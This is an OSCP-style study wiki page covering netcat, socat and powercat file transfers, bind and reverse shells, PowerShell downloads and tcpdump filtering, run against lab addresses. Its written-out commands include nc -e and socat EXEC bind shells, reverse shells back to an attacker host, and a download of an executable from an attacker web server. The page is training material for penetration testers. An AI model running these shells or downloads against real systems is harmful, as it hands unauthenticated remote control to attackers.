Welcome to the oscp wiki!
4.1.1 TCP/UDP Port
- Connect to TCP 110 (POP3 mail service) and read the banner
nc -nv 10.11.0.22 110
(UNKNOWN) [10.11.0.22] 110 (pop3) open
+OK POP3 server lab ready <00003.1277944@lab>
- Interact with the server: once connected, anything typed is sent to the service and its replies are printed on the terminal
nc -nv 10.11.0.22 110
(UNKNOWN) [10.11.0.22] 110 (pop3) open
4.1.2 Listening on a TCP/UDP Port
- Set up a listener on TCP 4444 on the Windows machine (IP address 10.11.0.22)
nc -nlvp 4444
listening on [any] 4444 ...
- Connect from the Linux attacker machine (10.11.0.4)
nc -nv 10.11.0.22 4444
(UNKNOWN) [10.11.0.22] 4444 (?) open
- The listener reports the connection; from here on, whatever is typed on one side is printed on the other (a simple chat)
nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.11.0.22] from (UNKNOWN) [10.11.0.4] 43447
4.1.3 Transferring Files with Netcat
- Set up a Netcat listener on port 4444 on the Windows machine and redirect everything it receives into a file
- Send wget.exe from the Kali machine to that listener (the file is taken from Kali's windows-resources directory)
nc -nlvp 4444 > incoming.exe
listening on [any] 4444 ...
locate wget.exe
/usr/share/windows-resources/binaries/wget.exe
nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe
(UNKNOWN) [10.11.0.22] 4444 (?) open
- The listener shows the incoming connection; Netcat gives no "transfer complete" message, so once the sending side has finished press Ctrl-C on the listener to close it and flush the file
nc -nlvp 4444 > incoming.exe
listening on [any] 4444 ...
connect to [10.11.0.22] from (UNKNOWN) [10.11.0.4] 43459
^C
C:\Users\offsec>
- Compare the size (or a hash) of incoming.exe with the original before running it; the transfer is unencrypted and unauthenticated, so a truncated or tampered file is easy to miss
4.1.4 Remote Administration with Netcat
- Execute a program on connect with -e: the listener hands a shell to whoever connects (a bind shell)
- Only netcat builds compiled with -e support have this option (the traditional netcat and the Windows nc.exe used in the course do; OpenBSD netcat does not)
- Windows listener
nc -nlvp 4444 -e cmd.exe
listening on [any] 4444 ...
- Linux listener
nc -nlvp 4444 -e /bin/bash
listening on [any] 4444 ...
- Anyone who can reach the port gets the shell: there is no authentication and the session is cleartext
4.2.2 Socat File Transfers
- TCP4-LISTEN:443 listens on port 443; fork creates a child process per incoming connection so the listener keeps serving after the first client
- file:secret_passwords.txt is the file handed to each client that connects
- Port 443 is privileged, hence sudo
sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt
4.2.3 Socat Reverse Shells
- Listener on TCP 443 (here on 10.11.0.22); -d -d raises the verbosity so connections are logged
socat -d -d TCP4-LISTEN:443 STDOUT
...
socat[4388] N listening on AF=2 0.0.0.0:443
- From the other machine, connect back to the listener and attach /bin/bash to the connection (a reverse shell)
socat TCP4:10.11.0.22:443 EXEC:/bin/bash
4.2.4 Socat Encrypted Bind Shells
- Create an OpenSSL self-signed certificate and private key
- Combine the .key and .crt files; the output is a single .pem file, which is what socat's cert= option expects
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
- verify=0 disables SSL certificate verification; with it set on both ends neither side authenticates the other, so the channel defeats passive sniffing but not an active man-in-the-middle
- Connect from the other machine (the listener here is on 10.11.0.4)
socat - OPENSSL:10.11.0.4:443,verify=0
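The key and certificate concatenation the bullets above describe, as an added example that is not the wiki's own commands: it generates the pair non-interactively, builds bind_shell.pem, and checks the PEM before socat is pointed at it. The CN, the output directory and the function names are assumptions.

```bash
#!/usr/bin/env bash
# Added example (not from the wiki): produce the bind_shell.pem used in 4.2.4.
# socat's cert= option wants the private key and the certificate in one PEM file.

# Self-signed certificate plus unencrypted (-nodes) key, non-interactive via -subj.
# Same openssl req options as the wiki command; the CN is an assumed value.
make_bind_shell_cert() {
    dir=${1:-.}
    openssl req -newkey rsa:2048 -nodes \
        -keyout "$dir/bind_shell.key" \
        -x509 -days 362 -subj "/CN=bind_shell" \
        -out "$dir/bind_shell.crt" 2>/dev/null
}

# The step the wiki describes but does not show: key first, then certificate.
make_pem() {
    dir=${1:-.}
    cat "$dir/bind_shell.key" "$dir/bind_shell.crt" > "$dir/bind_shell.pem"
    chmod 600 "$dir/bind_shell.pem"   # the PEM now carries the private key
    printf '%s\n' "$dir/bind_shell.pem"
}

# Sanity check before handing the file to socat: a key block and a certificate
# block must both be present, and the certificate must parse. Returns 0 if usable.
check_pem() {
    pem=$1
    grep -q 'BEGIN .*PRIVATE KEY' "$pem" &&
    grep -q 'BEGIN CERTIFICATE' "$pem" &&
    openssl x509 -in "$pem" -noout -subject >/dev/null 2>&1
}

# Usage, matching the wiki's listener/client pair:
#   sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
#   socat - OPENSSL:10.11.0.4:443,verify=0
```

Because both sides run with verify=0, the PEM only provides encryption, not identity: to actually authenticate the peer you would drop verify=0 on the client and give it the certificate to pin with cafile=.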
4.3.1 PowerShell File Transfers
- Windows 2016
- Allow script execution with Set-ExecutionPolicy Unrestricted and confirm with Get-ExecutionPolicy (the policy only gates .ps1 scripts; a one-liner passed with -c runs regardless)
- Download the file from the attacker's web server with System.Net.WebClient.DownloadFile
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
wget.exe -V
GNU Wget 1.9.1
4.3.5 Powercat File Transfers
- Netcat listener on Kali, writing whatever arrives to a file
sudo nc -lnvp 443 > receiving_powercat.ps1
- On Windows, with the powercat.ps1 script already loaded into the session, send the file with -i
powercat -c 10.11.0.4 -p 443 -i C:\Users\Offsec\powercat.ps1
4.3.6 Powercat Reverse Shells
- Send a reverse shell from the Windows machine to a Netcat listener on Kali
sudo nc -lvp 443
listening on [any] 443 ...
powercat -c 10.11.0.4 -p 443 -e cmd.exe
connect to [10.11.0.4] from (UNKNOWN) [10.11.0.22] 63699
Microsoft Windows [Version 10.0.17134.590]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\offsec>
4.3.7 Powercat Bind Shells
- A powercat bind shell on the Windows machine, connected to with Netcat from Kali
powercat -l -p 443 -e cmd.exe
nc 10.11.0.22 443
Microsoft Windows [Version 10.0.17134.590]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\offsec>
4.5.2 Filtering Traffic
- Read from our packet capture file and count packets per source (field 3 of tcpdump's output is the source address.port)
sudo tcpdump -n -r password_cracking_filtered.pcap | awk -F" " '{print $3}' | sort | uniq -c | head
- Filter by source host
sudo tcpdump -n src host 172.16.40.10 -r password_cracking_filtered.pcap
- Filter by destination host
sudo tcpdump -n dst host 172.16.40.10 -r password_cracking_filtered.pcap
- Filter by port
sudo tcpdump -n port 81 -r password_cracking_filtered.pcap
- Print packet contents in hex and ASCII (-X)
sudo tcpdump -nX -r password_cracking_filtered.pcap
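An added example (not from the wiki) that runs the counting pipeline from the first command above on constructed tcpdump text, so it can be tried without the pcap or root. It goes slightly beyond the wiki by also collapsing ports to count per host and by filtering on a source host in awk; the sample lines and the function names are assumptions.

```bash
#!/usr/bin/env bash
# Added example (not from the wiki): the "who talks the most" pipeline of 4.5.2
# applied to tcpdump's text output. Real usage:
#   sudo tcpdump -n -r password_cracking_filtered.pcap | top_sources

# Constructed sample in `tcpdump -n` line format: "<time> IP <src.port> > <dst.port>: ..."
SAMPLE_TCPDUMP='14:17:42.001 IP 208.68.234.99.33313 > 172.16.40.10.81: Flags [S], seq 1, win 1, length 0
14:17:42.002 IP 172.16.40.10.81 > 208.68.234.99.33313: Flags [S.], seq 2, ack 2, win 1, length 0
14:17:42.003 IP 208.68.234.99.33313 > 172.16.40.10.81: Flags [.], ack 3, win 1, length 0
14:17:42.004 IP 208.68.234.99.33314 > 172.16.40.10.81: Flags [S], seq 4, win 1, length 0
14:17:42.005 IP 172.16.40.10.81 > 208.68.234.99.33314: Flags [S.], seq 5, ack 5, win 1, length 0
14:17:42.006 IP 10.11.0.4.51000 > 172.16.40.10.22: Flags [S], seq 6, win 1, length 0
14:17:42.007 IP 208.68.234.99.33313 > 172.16.40.10.81: Flags [P.], seq 3:20, ack 3, win 1, length 17'

# Field 3 is "src.port" (field 5 is "dst.port:"). Count packets per source
# endpoint, most talkative first; only IP lines are considered.
top_sources() {
    awk '$2 == "IP" {print $3}' | sort | uniq -c | sort -rn
}

# Same, but strip the trailing port so the count is per source host.
top_source_hosts() {
    awk '$2 == "IP" {sub(/\.[0-9]+$/, "", $3); print $3}' | sort | uniq -c | sort -rn
}

# Text equivalent of `tcpdump -n src host X -r file`. The trailing "." in the
# prefix test stops 172.16.40.1 from matching 172.16.40.10.
from_host() {
    awk -v h="$1" '$2 == "IP" && index($3, h ".") == 1'
}

# Demo on the constructed sample.
printf '%s\n' "$SAMPLE_TCPDUMP" | top_sources
printf '%s\n' "$SAMPLE_TCPDUMP" | top_source_hosts
printf '%s\n' "$SAMPLE_TCPDUMP" | from_host 172.16.40.10
```

On a real capture the source count exposes a brute-forcing client immediately, since it shows up with far more packets than any other endpoint; the per-host variant is the one to use when the client cycles through many ephemeral ports.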